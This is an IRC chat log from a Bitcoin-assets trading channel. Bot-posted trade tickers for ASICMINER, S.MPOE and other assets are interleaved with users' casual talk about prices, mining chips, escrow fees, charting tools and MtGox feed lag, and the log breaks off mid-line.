[-] May 13 14:48:34 [BTCTC] [ASICMINER-PT] 1 @ 1.501001 BTC [+] May 13 14:49:51 [BTCTC] [ASICMINER-PT] 1 @ 1.501003 BTC [+] May 13 14:50:24 [MPEX] [S.MPOE] 1300 @ 0.00070791 = 0.9203 BTC [-] May 13 14:54:46 [BTCTC] [ASICMINER-PT] 1 @ 1.501002 BTC [-] May 13 14:56:10 [BTCTC] [ASICMINER-PT] 1 @ 1.501001 BTC [-] May 13 14:57:29 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [-] May 13 14:59:27 [BTCTC] [ASICMINER-PT] 1 @ 1.50001 BTC [-] May 13 15:03:09 [BTCTC] [ASICMINER-PT] 1 @ 1.50001 BTC [-] May 13 15:05:55 [MPEX] [S.MPOE] 3823 @ 0.00070791 = 2.7063 BTC [-] May 13 15:05:57 [MPEX] [S.MPOE] 4321 @ 0.00070722 = 3.0559 BTC [-] May 13 15:06:02 [MPEX] [S.MPOE] 10056 @ 0.00070721 = 7.1117 BTC [-] May 13 15:07:17 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 15:10:18 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 15:11:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.01473 = 0.0442 BTC [-] May 13 15:16:55 [MPEX] [S.MPOE] 94 @ 0.00070721 = 0.0665 BTC [-] May 13 15:25:14 [BTCTC] [TAT.ASICMINER] 82 @ 0.01495 = 1.2259 BTC [+] May 13 15:26:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.01495 BTC [+] May 13 15:29:26 [MPEX] [S.MPOE] 10200 @ 0.00070669 = 7.2082 BTC [-] May 13 15:30:41 [BTCTC] [TAT.ASICMINER] 42 @ 0.01495 = 0.6279 BTC [+] May 13 15:31:00 [BTCTC] [TAT.ASICMINER] 37 @ 0.01473 = 0.545 BTC [-] May 13 15:31:02 [BTCTC] [COGNITIVE] 1 @ 0.19446 BTC [-] May 13 15:31:07 [BTCTC] [TAT.ASICMINER] 63 @ 0.01473 = 0.928 BTC [-] May 13 15:33:38 [MPEX] [S.MPOE] 4450 @ 0.00070575 = 3.1406 BTC [-] May 13 15:33:40 [MPEX] [S.MPOE] 4321 @ 0.00070542 = 3.0481 BTC [-] May 13 15:33:48 [MPEX] [S.MPOE] 7150 @ 0.00070541 = 5.0437 BTC [-] May 13 15:33:50 [MPEX] [S.MPOE] 12729 @ 0.000705 = 8.9739 BTC [-] May 13 15:42:00 [BTCTC] [ASICMINER-PT] 1 @ 1.523994 BTC [+] May 13 15:46:43 [MPEX] [S.MPOE] 12500 @ 0.000705 = 8.8125 BTC [-] May 13 15:54:01 [BTCTC] [GSDPT] 2 @ 0.00304 = 0.0061 BTC [+] May 13 15:57:02 ;;ticker --last May 13 15:57:17 117.89999 May 13 16:07:11 blah May 13 16:08:22 [MPEX] [S.MPOE] 2687 @ 0.00070669 = 1.8989 BTC [+] May 13 16:09:19 [BTCTC] [BASIC-MINING] 1 @ 0.412 BTC [-] May 13 16:09:48 [BTCTC] [BASIC-MINING] 2 @ 0.411002 = 0.822 BTC [-] May 13 16:12:17 [BTCTC] [ASICMINER-PT] 1 @ 1.500001 BTC [-] May 13 16:12:28 [BTCTC] [ASICMINER-PT] 3 @ 1.5 = 4.5 BTC [-] May 13 16:13:57 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 16:14:01 [BTCTC] [ASICMINER-PT] 1 @ 1.495108 BTC [-] May 13 16:14:06 [BTCTC] [ASICMINER-PT] 2 @ 1.4951 = 2.9902 BTC [-] May 13 16:14:20 [BTCTC] [ASICMINER-PT] 5 @ 1.495 = 7.475 BTC [-] May 13 16:14:41 ;;next May 13 16:14:46 ;;ticker May 13 16:14:59 gribble is napping May 13 16:15:04 again May 13 16:15:57 thick, how do you see this week ? May 13 16:16:22 140$ or 90$ friday ? May 13 16:16:28 MPOE-PR bitching in AM thread -> popcorn time May 13 16:16:31 [BTCTC] [ASICMINER-PT] 1 @ 1.523999 BTC [+] May 13 16:16:48 I stopped watching closely because I believe the fundamental low has risen enough to make us stable above 105 or so May 13 16:17:01 [HAVELOCK] [ASICM] 349 @ 0.01471003 = 5.1338 BTC [-] May 13 16:17:02 [HAVELOCK] [ASICM] 151 @ 0.01471002 = 2.2212 BTC [-] May 13 16:17:39 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 16:17:40 won't start watching again til this weekend May 13 16:17:52 [BTCTC] [ASICMINER-PT] 1 @ 1.524 BTC [+] May 13 16:18:10 with the convention ? May 13 16:18:22 nah May 13 16:18:33 [BTCTC] [ASICMINER-PT] 1 @ 1.524 BTC [+] May 13 16:18:41 that's just when I think the bottom might meet current price May 13 16:18:59 interested to see if that gets us back into steady-rise mode May 13 16:19:02 [BTCTC] [ASICMINER-PT] 2 @ 1.524 = 3.048 BTC [+] May 13 16:20:12 what happened to our supernode? was he raped? May 13 16:20:13 i have a bet, 500$ by end of summer ! May 13 16:20:22 [BTCTC] [PAJKA.BOND] 1 @ 0.106 BTC [-] May 13 16:20:51 error, that's quite a risky bet May 13 16:21:05 [MPEX] [S.MPOE] 519 @ 0.00070669 = 0.3668 BTC [+] May 13 16:21:07 [MPEX] [S.MPOE] 1750 @ 0.00070809 = 1.2392 BTC [+] May 13 16:21:08 yes i know ! that why is a 10€ bet :D May 13 16:21:11 [MPEX] [S.MPOE] 381 @ 0.00070842 = 0.2699 BTC [+] May 13 16:22:20 [BTCTC] [ASICMINER-PT] 1 @ 1.524499 BTC [+] May 13 16:22:27 [BTCTC] [ASICMINER-PT] 1 @ 1.5245 BTC [+] May 13 16:22:41 I need some avalon chips ! ? any link for a auction or a sell ? May 13 16:23:47 search forum May 13 16:23:50 there are several May 13 16:24:14 do u vouch for 1 ? May 13 16:24:18 no May 13 16:24:22 :D May 13 16:24:42 I think it's wste of time to buy chips unless you have big plans May 13 16:26:01 [HAVELOCK] [ASICM] 1 @ 0.01491 BTC [+] May 13 16:26:54 MPOE-PR has some worthy points about AM, but they are hard to swallow when they are dripping with vindictiveness May 13 16:26:59 https://bitcointalk.org/index.php?topic=187663.0 is a german groubuy May 13 16:27:35 thx May 13 16:28:21 ThickAsThieves: well said May 13 16:29:20 https://bitcointalk.org/index.php?topic=202600.0;topicseen May 13 16:30:00 [BTCTC] [ASICMINER-PT] 1 @ 1.549788 BTC [+] May 13 16:30:37 error4733, that kind of thing is indistinguishable from a scam May 13 16:30:38 so my wet dream to bought some chips and send it to this guy is just a wet dream ? May 13 16:30:40 must be scam ;) May 13 16:30:54 if it quacks like a duck... May 13 16:33:32 Q. Will you do escrow? May 13 16:33:32 A. No. May 13 16:33:39 byeeeeeee May 13 16:33:43 [MPEX] [S.MPOE] 8250 @ 0.000705 = 5.8163 BTC [-] May 13 16:33:54 ;;ticker May 13 16:34:02 oh May 13 16:34:03 escrow? John (John K.) is the real supernode in bitcoinland May 13 16:34:10 he charges too much May 13 16:34:18 yea May 13 16:34:31 [BTCTC] [TAT.ASICMINER] 3 @ 0.0149 = 0.0447 BTC [+] May 13 16:34:34 i understang getting paid May 13 16:34:37 [BTCTC] [ASICMINER-PT] 1 @ 1.549787 BTC [-] May 13 16:34:48 but on bigger deals, 1-1.5% is a bit much May 13 16:35:02 [BTCTC] [ASICMINER-PT] 1 @ 1.549789 BTC [+] May 13 16:35:17 he charges for escrow ? always tought he asked for tips, not a % May 13 16:35:26 [BTCTC] [ASICMINER-PT] 1 @ 1.549786 BTC [-] May 13 16:35:37 he changed May 13 16:35:42 cuz no one tipped May 13 16:35:51 [BTCTC] [ASICMINER-PT] 1 @ 1.502001 BTC [-] May 13 16:35:52 cant blame him May 13 16:35:55 [BTCTC] [ASICMINER-PT] 3 @ 1.549786 = 4.6494 BTC [+] May 13 16:35:59 but he needs a better scale May 13 16:36:48 [BTCTC] [ASICMINER-PT] 1 @ 1.510345 BTC [-] May 13 16:36:51 he take 1-1.5% of all blade money ???? May 13 16:37:11 hello May 13 16:37:36 [BTCTC] [ASICMINER-PT] 1 @ 1.511 BTC [+] May 13 16:37:37 dunno May 13 16:37:39 ;;ticker May 13 16:39:07 Error: Failure to retrieve ticker. Try again later. May 13 16:39:29 ;;bc,stats May 13 16:40:48 this is dead May 13 16:40:54 anyone here May 13 16:40:56 ???? May 13 16:54:43 jesus May 13 17:12:52 ThickAsThieves: freenode's still under ddos May 13 17:13:01 ah May 13 17:13:01 https://twitter.com/search?q=%23FreeNode&src=hash May 13 17:13:01 [BTCTC] [TAT.ASICMINER] 38 @ 0.01494 = 0.5677 BTC [+] May 13 17:13:01 [MPEX] [S.MPOE] 5000 @ 0.00070646 = 3.5323 BTC [+] May 13 17:13:01 what's the point of ddosing freenode? May 13 17:13:08 trying to sneak in to grab pw's somehow? May 13 17:13:22 dunno May 13 17:24:18 [BTCTC] [ASICMINER-PT] 1 @ 1.547999 BTC [+] May 13 17:24:23 [BTCTC] [ASICMINER-PT] 1 @ 1.548 BTC [+] May 13 17:24:36 [BTCTC] [ASICMINER-PT] 1 @ 1.548897 BTC [+] May 13 17:26:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.01495 = 0.2243 BTC [+] May 13 17:27:00 [HAVELOCK] [ASICM] 3 @ 0.014905 = 0.0447 BTC [+] May 13 17:27:14 [BTCTC] [TAT.ASICMINER] 110 @ 0.01495 = 1.6445 BTC [+] May 13 17:37:59 Public confirmation that TAT Investments hold more ASICMINER shares than it has sold: https://bitcointalk.org/index.php?topic=199449.msg2132062#msg2132062 May 13 17:38:14 I also have plenty more coming in from incoming deals. May 13 17:46:58 [BTCTC] [ASICMINER-PT] 1 @ 1.513 BTC [-] May 13 17:47:09 [BTCTC] [ASICMINER-PT] 1 @ 1.512005 BTC [-] May 13 17:47:22 [BTCTC] [ASICMINER-PT] 1 @ 1.512004 BTC [-] May 13 17:48:00 [BTCTC] [ASICMINER-PT] 1 @ 1.512 BTC [-] May 13 17:48:37 [BTCTC] [TAT.ASICMINER] 10 @ 0.01495 = 0.1495 BTC [+] May 13 17:49:07 [BTCTC] [ASICMINER-PT] 1 @ 1.511 BTC [-] May 13 17:49:25 http://bitbet.us/bet/307/bfl-will-deliver-asic-devices-before-july-1st/ May 13 17:49:56 how will this be judged? if they get a usb powered jalepeno? an SC that is within 10% power? Did they specify power? May 13 17:49:56 [BTCTC] [ASICMINER-PT] 1 @ 1.511001 BTC [+] May 13 17:50:14 for anything beyond jalepeno? May 13 17:50:36 just wondering if they ship something within' that range, like an SC.. the bet should be yes? May 13 17:59:07 [BTCTC] [ASICMINER-PT] 1 @ 1.511001 BTC [+] May 13 18:02:27 [BTCTC] [ASICMINER-PT] 1 @ 1.511 BTC [-] May 13 18:03:24 [BTCTC] [ASICMINER-PT] 7 @ 1.51 = 10.57 BTC [-] May 13 18:07:28 [BTCTC] [BITVPS] 1 @ 0.0009 BTC [+] May 13 18:07:46 [MPEX] [S.MPOE] 5842 @ 0.000705 = 4.1186 BTC [-] May 13 18:07:48 [MPEX] [S.MPOE] 3800 @ 0.00070429 = 2.6763 BTC [-] May 13 18:07:50 [MPEX] [S.MPOE] 6638 @ 0.00070421 = 4.6745 BTC [-] May 13 18:26:18 deadweasel 1gh/w May 13 18:26:49 "oh no, but that is not possible!" May 13 18:26:51 well May 13 18:26:56 apparently bitfuy disagrees May 13 18:27:45 anyone have any custom charts for the assets :) May 13 18:27:53 hm? May 13 18:28:12 [MPEX] [S.MPOE] 2237 @ 0.00070421 = 1.5753 BTC [-] May 13 18:28:13 [MPEX] [S.MPOE] 2500 @ 0.00070366 = 1.7592 BTC [-] May 13 18:28:13 kind of like cryptocharts.info but for all assets and asset exchanges May 13 18:28:16 [MPEX] [S.MPOE] 2163 @ 0.00070192 = 1.5183 BTC [-] May 13 18:28:26 theres 3 charting tools for mpex May 13 18:28:33 the rest of it who cares May 13 18:28:38 haha May 13 18:29:27 does anyone display mpex charts anywhere? or is it all within mpex? May 13 18:29:28 BitHun, there is someone that does that May 13 18:29:44 jurov made charts for mpex May 13 18:29:47 okey babe, got a link? May 13 18:29:53 pizzaman1337 made charts for mpex May 13 18:29:58 kakobrekla made charts for mpex May 13 18:30:09 cool, mind if i check it out? May 13 18:30:10 that should do it May 13 18:30:37 babe = TAT May 13 18:30:40 http://fnords.dontexist.com/chart/TAT.ASICMINER May 13 18:30:57 http://live.coinbr.com/?mpsic=S.MPOE May 13 18:31:00 http://mpexcharts.com/ May 13 18:31:04 http://fnords.dontexist.com/ May 13 18:31:07 I made some basic charts for mpex recently, started logging bids/asks http://mpexcharts.com/ May 13 18:31:11 http://bitcoin-assets.com/mpex-socket/ May 13 18:31:21 there ya go May 13 18:31:21 oh nice TAT, thank you, thanks kako May 13 18:31:54 and pizzaman, thanks May 13 18:32:40 TAT that chart is too much like bitfunders :( saddens me cant make a csv out of it May 13 18:33:52 [BTCTC] [TAT.ASICMINER] 2 @ 0.01495 = 0.0299 BTC [+] May 13 18:34:06 TAT Investments Transparency & Security Report: https://bitcointalk.org/index.php?topic=192499.msg2132287#msg2132287 May 13 18:34:17 oh jesus, mpex sierra chart feed May 13 18:35:06 what? May 13 18:35:19 that's what i'm talking about, awesome, anyone have a bridge for havelock, btct, bitfunder? May 13 18:35:58 ill take your money if you are lazy May 13 18:36:09 absoltely May 13 18:36:29 absolutely May 13 18:36:32 hehe May 13 18:36:35 mebbe May 13 18:36:44 that mpex sierrachart is genius, i was going to donate just based on that May 13 18:37:02 it costs 1 btc per year May 13 18:37:03 where should i sent .1 too? May 13 18:37:05 so no need to donate May 13 18:37:08 send* May 13 18:37:16 ahh k May 13 18:37:36 its for people who really need it ya know May 13 18:38:31 NOTE: TAT Investments is currently the [i]only [/i]passthrough provider that shares this level of transparency. It is our mission to set a new standard in bitcoin investments. May 13 18:38:44 sorry for bbcode and shameless promo May 13 18:38:45 i really need all of them May 13 18:38:50 but I'm calling people out May 13 18:38:52 :) May 13 18:39:42 well pm me bithub when and if you want to set it up. May 13 18:39:56 pming now May 13 18:40:05 you mean for all of them or just mpex? May 13 18:40:13 right now i have mpex May 13 18:40:26 stocks, i also have options but on another channel May 13 18:40:30 not documented May 13 18:40:47 so this sierra mpex feed costs 1btc a year? May 13 18:40:52 correct May 13 18:41:58 exe May 13 18:42:16 its opensouce, the client and protocol May 13 18:42:26 you can do whatever implementation on it May 13 18:42:38 sierra subscription only .8 for the year :) May 13 18:42:48 is it? May 13 18:42:58 its pretty cheap May 13 18:43:05 sierra is free May 13 18:43:11 unless you want to use their servers May 13 18:43:13 for 14 days or something May 13 18:43:17 naw May 13 18:43:22 i just had to pay for a subscription May 13 18:43:24 if you use this socket May 13 18:43:33 you can use demo May 13 18:43:35 [MPEX] [S.MPOE] 5783 @ 0.00070192 = 4.0592 BTC [-] May 13 18:43:36 ahh yeah, because not official feed May 13 18:43:37 [MPEX] [S.MPOE] 1917 @ 0.00070174 = 1.3452 BTC [-] May 13 18:43:38 gotchu May 13 18:43:39 yea May 13 18:44:33 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] May 13 18:44:44 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [-] May 13 18:44:58 very cool, i'll come back to it oneday May 13 18:45:09 k May 13 18:46:40 [BTCTC] [PAJKA.BOND] 7 @ 0.104 = 0.728 BTC [-] May 13 18:46:53 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [-] May 13 18:53:52 [MPEX] [S.MPOE] 1000 @ 0.00070646 = 0.7065 BTC [+] May 13 18:53:54 [MPEX] [S.MPOE] 879 @ 0.00070725 = 0.6217 BTC [+] May 13 18:54:01 [MPEX] [S.MPOE] 3940 @ 0.00070842 = 2.7912 BTC [+] May 13 18:54:03 [MPEX] [S.MPOE] 1483 @ 0.00070927 = 1.0518 BTC [+] May 13 18:58:13 kakobrekla: sierrachart is something like metatrader ? May 13 18:58:23 kakobrekla: (pardon my ignorance) May 13 18:58:47 well yes and no May 13 18:59:04 like a client you connect to your broker ? (or directly to an exchange? i'd imagine not) May 13 18:59:15 does it use fix ? May 13 18:59:19 yes you can trade from it May 13 18:59:30 but lots of ppl use it to chart only May 13 18:59:37 i see May 13 18:59:42 you missed this? https://www.sierrachart.com/SupportBoard.php?ThreadID=527 May 13 18:59:45 there are heaps of peeps working on software like that tho for cryptos May 13 18:59:55 howso May 13 19:00:05 this is fun: We see that the MTGox data feed is not entirely reliable and also from an engineering perspective, its technical implementation really is very confusing and not well structured. They are using what is called a web socket and then on top of that Socket I/O . This is unnecessary and the method by which this is implemented is not technically correct. So we are not very impressed with the MTGox data feed. This is just a comment. May 13 19:00:45 interesting, so it's sierracharts itself that collects the feed from mtgox May 13 19:01:11 not sure what their implementation will be exactly May 13 19:01:23 i mean if they will proxy it or no, im guessing they will May 13 19:01:47 relying on the mtgox ws feed sounds like folly May 13 19:01:48 anyway you will be able to trade from it somehow apparently May 13 19:01:57 its gonna suck as bad as gox does May 13 19:02:01 so im not worried. May 13 19:03:51 [MPEX] [S.MPOE] 3550 @ 0.00070193 = 2.4919 BTC [-] May 13 19:03:55 [BTCTC] [TAT.ASICMINER] 6 @ 0.01495 = 0.0897 BTC [+] May 13 19:04:02 what's that thing that everyone uses? goxtool or something May 13 19:04:33 goxtoolbox extraordinaire May 13 19:04:53 supercalifragilistickexpialidociousgoxtool ? May 13 19:05:11 supercalifragilistickexpialidociousgoxtool reloaded deluxe edition ? May 13 19:05:21 with extra flavour. May 13 19:06:43 [BTCTC] [TAT.ASICMINER] 13 @ 0.01495 = 0.1944 BTC [+] May 13 19:06:49 dick flavour May 13 19:06:56 hanhanhan May 13 19:07:01 :) May 13 19:08:10 #110 May 13 19:08:10 That's great news. Keep up the good work. May 13 19:08:10 You can retrieve the engine lag from https://data.mtgox.com/api/1/generic/order/lag . Sometimes this grows to couple of minutes, and every order you send (or quotes) are delayed by this amount. So it's nice to know about this value when doing trades. May 13 19:08:19 Sierra Chart Engineering : Interesting. Never heard of such a concept when it comes to trading. We would think that immediate execution should always be achieved as much as possible. May 13 19:08:21 bahahaha May 13 19:09:03 [BTCTC] [ASICMINER-PT] 1 @ 1.538799 BTC [+] May 13 19:09:09 [BTCTC] [ASICMINER-PT] 1 @ 1.5388 BTC [+] May 13 19:09:16 [BTCTC] [ASICMINER-PT] 1 @ 1.5399 BTC [+] May 13 19:09:21 [BTCTC] [ASICMINER-PT] 2 @ 1.5399 = 3.0798 BTC [+] May 13 19:09:25 i'm developing this redis-based in-memory trading engine, gonna sell it to markie karpie and kill his lag May 13 19:10:22 BUT MY WHEEL GONNA ROLL MUCH MUCH FASTER May 13 19:12:00 [HAVELOCK] [ASICM] 140 @ 0.01491 = 2.0874 BTC [+] May 13 19:12:38 davout dont do that. May 13 19:12:54 [MPEX] [S.DICE] 200 @ 0.003 = 0.6 BTC [-] May 13 19:12:56 kakobrekla: tell me more May 13 19:12:56 [MPEX] [S.DICE] 550 @ 0.00296049 = 1.6283 BTC [-] May 13 19:13:53 [BTCTC] [BTC-BOND] 50 @ 0.01 = 0.5 BTC [-] May 13 19:14:06 kakobrekla: whats up? May 13 19:14:07 first of all you want to kill gox not save it and second of all for fucks sake, theres a bunch of wheels you could use May 13 19:14:10 [BTCTC] [ESECURITYSABTC] 1 @ 0.43465 BTC [+] May 13 19:14:15 [BTCTC] [ESECURITYSABTC] 1 @ 0.434658 BTC [+] May 13 19:14:25 kakobrekla: well, there's three things May 13 19:14:28 mjr_1: reverse value of alt chains May 13 19:14:34 mjr_2 even May 13 19:14:37 [BTCTC] [PAJKA.BOND] 5 @ 0.106 = 0.53 BTC [+] May 13 19:14:47 inverse May 13 19:14:50 whatever. May 13 19:14:51 1. i'd never sell out to mtgox, i'd rather die. (unless their offer is reasonable of course) May 13 19:14:57 lol May 13 19:14:59 2. i like coding, it is fun May 13 19:15:12 (especially ruby+redis+eventmachine) May 13 19:15:22 3. it's going to be fast May 13 19:15:24 switch to meteor May 13 19:15:26 its amazingt May 13 19:15:35 blah May 13 19:15:38 its not just about fast May 13 19:15:43 4. i'm not going to have to learn sthg else May 13 19:15:46 and basically 10k tps is good enough for a year or so May 13 19:15:50 you can get that in day May 13 19:15:54 5. i don't really know of other wheels i could use May 13 19:16:03 in a day* May 13 19:16:09 yo May 13 19:16:20 [BTCTC] [BASIC-MINING] 1 @ 0.412 BTC [+] May 13 19:16:22 if you have pointers to wheels i could use i'm interested May 13 19:16:27 mjr_2 where you got those skateboard wheels? May 13 19:16:58 SKATEBOARDS! May 13 19:17:00 [HAVELOCK] [SDICE] 2 @ 0.2925 = 0.585 BTC [-] May 13 19:17:05 im srs. May 13 19:17:18 [BTCTC] [B.YABMC] 8 @ 0.01776 = 0.1421 BTC [+] May 13 19:17:19 [BTCTC] [PAJKA.BOND] 4 @ 0.106 = 0.424 BTC [+] May 13 19:17:51 which? May 13 19:17:56 skateboard wheels? May 13 19:18:00 ABEC 5 May 13 19:18:31 i have neither a skateboard nor skateboard wheels... May 13 19:18:33 okay, I have to ask, at the risk of being chastized, wtf is this skateboards shit May 13 19:18:40 LOL May 13 19:18:41 satahp May 13 19:18:55 ThickAsThieves: check out the comments on my blog May 13 19:18:58 blog.btcshares.com May 13 19:19:01 its explained thre May 13 19:19:05 thx May 13 19:19:07 np May 13 19:19:32 ack the whit on black kills me eyes! May 13 19:20:28 i see no mention of skateboards May 13 19:20:38 comments, followup post May 13 19:20:40 hold on May 13 19:20:55 ah May 13 19:20:59 http://blog.btcshares.com/follow-up May 13 19:21:58 are skateboards even cool anymore? May 13 19:21:59 [HAVELOCK] [SDICE] 1 @ 0.2925 BTC [-] May 13 19:22:15 i recall them having a comeback along with 90s punk May 13 19:22:23 maybe i'm out of touch May 13 19:27:55 [BTCTC] [TAT.ASICMINER] 10 @ 0.01485 = 0.1485 BTC [-] May 13 19:28:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.01481 BTC [-] May 13 19:28:14 [BTCTC] [TAT.ASICMINER] 14 @ 0.01481 = 0.2073 BTC [-] May 13 19:28:25 [BTCTC] [TAT.ASICMINER] 43 @ 0.01495 = 0.6429 BTC [+] May 13 19:34:11 [MPEX] [S.MPOE] 771 @ 0.00070193 = 0.5412 BTC [-] May 13 19:34:11 [MPEX] [S.MPOE] 5829 @ 0.00070174 = 4.0904 BTC [-] May 13 19:38:36 [BTCTC] [ASICMINER-PT] 1 @ 1.539997 BTC [+] May 13 19:40:36 [BTCTC] [COGNITIVE] 1 @ 0.194129 BTC [-] May 13 19:41:02 [BTCTC] [COGNITIVE] 1 @ 0.19413 BTC [+] May 13 19:41:27 [BTCTC] [S.MPOE-PT] 14 @ 0.000666 = 0.0093 BTC [-] May 13 19:41:47 [BTCTC] [COGNITIVE] 1 @ 0.195 BTC [+] May 13 19:50:29 [MPEX] [S.MPOE] 3354 @ 0.00070174 = 2.3536 BTC [-] May 13 19:50:29 [MPEX] [S.MPOE] 3100 @ 0.00070102 = 2.1732 BTC [-] May 13 19:50:33 [BTCTC] [BITVPS] 1 @ 0.0009 BTC [+] May 13 19:50:56 [BTCTC] [ASICMINER-PT] 1 @ 1.511001 BTC [-] May 13 19:51:20 [MPEX] [S.MPOE] 11600 @ 0.00069934 = 8.1123 BTC [-] May 13 19:52:25 [BTCTC] [ASICMINER-PT] 1 @ 1.511 BTC [-] May 13 19:57:00 [HAVELOCK] [SDICE] 2 @ 0.2925 = 0.585 BTC [-] May 13 20:00:07 http://www.thoughtcrime.org/blog/saudi-surveillance/ May 13 20:03:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.01495 BTC [+] May 13 20:04:16 [BTCTC] [PAJKA.BOND] 8 @ 0.104 = 0.832 BTC [-] May 13 20:04:31 [BTCTC] [PAJKA.BOND] 1 @ 0.104 BTC [-] May 13 20:07:21 [BTCTC] [ASICMINER-PT] 3 @ 1.51 = 4.53 BTC [-] May 13 20:07:33 [BTCTC] [ASICMINER-PT] 1 @ 1.502 BTC [-] May 13 20:07:37 [BTCTC] [ASICMINER-PT] 1 @ 1.501107 BTC [-] May 13 20:07:49 [BTCTC] [ASICMINER-PT] 1 @ 1.500001 BTC [-] May 13 20:07:55 [BTCTC] [ASICMINER-PT] 6 @ 1.5 = 9 BTC [-] May 13 20:07:59 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 20:11:02 [BTCTC] [TAT.ASICMINER] 150 @ 0.01486 = 2.229 BTC [-] May 13 20:12:29 [BTCTC] [COG.F] 1 @ 2.5 BTC [+] May 13 20:14:09 [BTCTC] [TAT.ASICMINER] 7 @ 0.01495 = 0.1047 BTC [+] May 13 20:16:51 [BTCTC] [ASICMINER-PT] 2 @ 1.5 = 3 BTC [-] May 13 20:21:39 [BTCTC] [RSM] 101 @ 0.009 = 0.909 BTC [+] May 13 20:21:45 [BTCTC] [RSM] 1 @ 0.009 BTC [+] May 13 20:22:05 [BTCTC] [ASICMINER-PT] 1 @ 1.5 BTC [-] May 13 20:23:03 [BTCTC] [RSM] 30 @ 0.01 = 0.3 BTC [+] May 13 20:23:05 [BTCTC] [TAT.ASICMINER] 25 @ 0.01485 = 0.3713 BTC [-] May 13 20:26:50 [BTCTC] [TAT.ASICMINER] 13 @ 0.01485 = 0.1931 BTC [-] May 13 20:26:53 [BTCTC] [TAT.ASICMINER] 30 @ 0.014801 = 0.444 BTC [-] May 13 20:27:05 [BTCTC] [TAT.ASICMINER] 40 @ 0.0148 = 0.592 BTC [-] May 13 20:27:12 [BTCTC] [TAT.ASICMINER] 119 @ 0.01474 = 1.7541 BTC [-] May 13 23:29:44 [MPEX] [S.MPOE] 8500 @ 0.00068706 = 5.84 BTC [+] May 13 23:29:44 google translator had serious trouble May 13 23:29:44 [BTCTC] [PAJKA.BOND] 1 @ 0.1059 BTC [+] May 13 23:29:44 hi mircea_popescu, bitcoin expected to go up thanks to fresh supply of drama from finland May 13 23:29:55 [MPEX] [S.MPOE] 7963 @ 0.00068436 = 5.4496 BTC [-] May 13 23:31:11 a coolness. May 13 23:31:12 wghat nao ? May 13 23:32:59 [HAVELOCK] [ASICM] 2 @ 0.014915 = 0.0298 BTC [+] May 13 23:34:44 [BTCTC] [CRYPTO-TRADE] 3 @ 0.19 = 0.57 BTC [+] May 13 23:36:25 [BTCTC] [ASICMINER-PT] 1 @ 1.5189 BTC [+] May 13 23:39:50 [BTCTC] [ASICMINER-PT] 1 @ 1.519 BTC [+] May 13 23:42:42 [MPEX] [S.MPOE] 687 @ 0.00068436 = 0.4702 BTC [-] May 13 23:44:57 [HAVELOCK] [ASICM] 18 @ 0.014915 = 0.2685 BTC [+] May 13 23:52:02 mircea_popescu: btw. where did the black theme of mpex.co go? May 13 23:52:15 FabianB nowhere ? May 13 23:52:31 http://mpex.co/?mpsic=S.MPOE&r=true is white May 13 23:52:59 use ?r=1 May 13 23:53:14 oh, my fault May 13 23:53:44 https://bitcointalk.org/index.php?topic=203837.msg2135434#msg2135434 lmao May 13 23:55:00 wow, this guy is manic. how could anybody trust someone like that? May 13 23:55:14 re: rpietila public diary May 13 23:55:35 definitely. May 13 23:56:15 i didn't judge him for being manic... just pointed it out. facts are not judgements May 13 23:56:25 his posting history will back me up. May 13 23:56:33 btw, how the hell are you truffles? May 13 23:56:55 i'm about to get started as well. May 13 23:57:05 o/ high five May 13 23:57:31 only I have no troubles... May 13 23:57:36 [BTCTC] [ASICMINER-PT] 1 @ 1.51999 BTC [+] May 13 23:57:37 could somebody give me a reason to drink? May 13 23:57:53 but when you worry you make them double May 13 23:57:56 so don't worry May 13 23:57:58 be happy May 13 23:58:05 [BTCTC] [ASICMINER-PT] 4 @ 1.519 = 6.076 BTC [-] May 13 23:58:15 [BTCTC] [ASICMINER-PT] 3 @ 1.519 = 4.557 BTC [-] May 13 23:58:41 O.o how? May 13 23:58:45 has that occurred? May 13 23:58:57 a lot has changed in 36 minutes I was away May 13 23:59:01 [BTCTC] [ASICMINER-PT] 1 @ 1.501 BTC [-] May 13 23:59:21 indeed, poking the beehive I see. May 13 23:59:30 this is a good palce for that May 13 23:59:48 jurov, you get someone to finish that weak-ass 'guide' I started? May 14 00:00:02 no truf, fleas May 14 00:00:30 deadweasel: did not search further yet, had other things to do May 14 00:00:40 jurov, that was my problem too May 14 00:00:55 yes. and taking afternoon naps May 14 00:01:00 damn straight May 14 00:02:06 I'm guessing all MPEX IPOs have been delayed until interest in bitcoin has resurfaced? May 14 00:02:18 not that they are many... May 14 00:02:28 deadweasel: you know of any? May 14 00:02:46 nope May 14 00:03:10 like, S.BRKH ? May 14 00:03:28 S Burkah? are we invested in Islamic women? May 14 00:03:36 this is not good.... May 14 00:03:45 their husbands will be pissed and start a war against..... May 14 00:03:50 oh, too late. May 14 00:03:58 http://finance.yahoo.com/q?s=BRK-A i meant this May 14 00:04:17 great vid of him and munger. May 14 00:04:21 that's been on my brain lately. May 14 00:04:36 that ratpoison one? May 14 00:04:45 yup May 14 00:04:58 [HAVELOCK] [ASICM] 4 @ 0.01491899 = 0.0597 BTC [+] May 14 00:08:09 wouldn't surprise me if few dudes met in a trollbox somwehere and came out with the name May 14 00:09:23 :) May 14 00:09:36 lmao May 14 00:10:26 yes, it tends to spill ver May 14 00:10:32 *over May 14 00:11:13 [BTCTC] [BASIC-MINING] 1 @ 0.411004 BTC [-] May 14 00:11:27 [BTCTC] [BASIC-MINING] 9 @ 0.411003 = 3.699 BTC [-] May 14 00:11:47 i'm totally using it "yes, this thing spilled over from trollbox" May 14 00:11:59 [HAVELOCK] [ASICM] 15 @ 0.01491899 = 0.2238 BTC [+] May 14 00:13:13 [BTCTC] [PAJKA.BOND] 34 @ 0.1059 = 3.6006 BTC [+] May 14 00:14:10 [BTCTC] [PAJKA.BOND] 5 @ 